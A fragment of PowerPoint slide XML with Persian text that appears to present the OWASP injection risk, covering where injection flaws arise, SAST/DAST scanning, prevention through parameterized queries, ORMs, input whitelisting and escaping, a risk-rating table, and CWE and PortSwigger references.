                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها، کوکی ها، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SOAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و ورودی های داده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>می توان نقص تزریق را پیگیری کرد. سازمانها می توانند از ابزارهای منبع استاتیک (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و آزمون برنامه کاربردی پویا (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را در خط لوله </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CI / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> برای شناسایی نقص های تزریق  معرفی شده قبل از تولید در اختیار بگیرند و استفاده کنند. .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>منابع</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8"/>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9"/>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fa-IR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>خارجی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId15"/>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6"/>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6"/>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7"/>
              </a:rPr>
              <a:t>CWE-89: SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>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CWE-564: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>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PortS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>wigger: Server-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>injection</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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نحوه پیشگیری از حمله:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>جهت جلوگیری از حمله تزریق نیاز داریم داده‌ها جدا از دستورات و پرس و جوها نگه داری شوند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>گزینه ترجیح داده شده این است که از یک </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> مطمئن استفاده کنید که از استفاده کامل از مفسر اجتناب می کند یا یک رابط کاربری پارامتریک را فراهم می کند یا برای استفاده از ابزارهای مدل سازی ارتباطی شیء (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ORM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مهاجرت می کند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نکته: هنگام پارامتر کردن، روش های ذخیره شده هنوز می توانند تزریق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را در صورت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>PL / SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>T-SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پیوندها و داده ها را پیوند دهند یا داده های خصمانه را با </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>EXECUTE IMMEDIATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>exec () </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> اجرا کنند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>استفاده از تصدیق ورودی مثبت یا "لیست سفید" سمت سرور توصیه میشود، اما این یک محافظت کامل ایجاد نمیکند، زیرا بسیاری از برنامه ها نیاز به کاراکترهای خاص مانند ناحیه های متن یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> برای برنامه های کاربردی تلفن همراه دارند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برای هر پرس و جو پویای باقی مانده، گریز از کاراکترهای خاصی با استفاده از گریز از سینتکس خاص برای آن مفسر. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نکته: ساختار </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> مانند نام جدول، نام ستون و غیره نمیتواند گریزی داشته باشد و بنابراین ساختار ورودی های ارائه شده توسط کاربر خطرناک است. این یک مسئله رایج در نرم افزار گزارش نوشتن است.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>استفاده از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>LIMIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> و دیگر کنترل های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>  درون پرس و جوها برای جلوگیری از افشای رکوردهای پرونده ها در حملا تزریق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRP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pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>تزریق</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512351948"/>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15045">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1389755">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472">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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>۳</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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۲</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابل کشف بودن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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۳</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fa-IR" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0"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۳</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gn="just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تقریبا هر منبع داده می تواند یک بردار تزریق، متغیرهای محیطی، پارامترها، خدمات وب داخلی و خارجی و انواع مختلف کاربران باشد. </a:t>
                      </a:r>
                      <a:r>
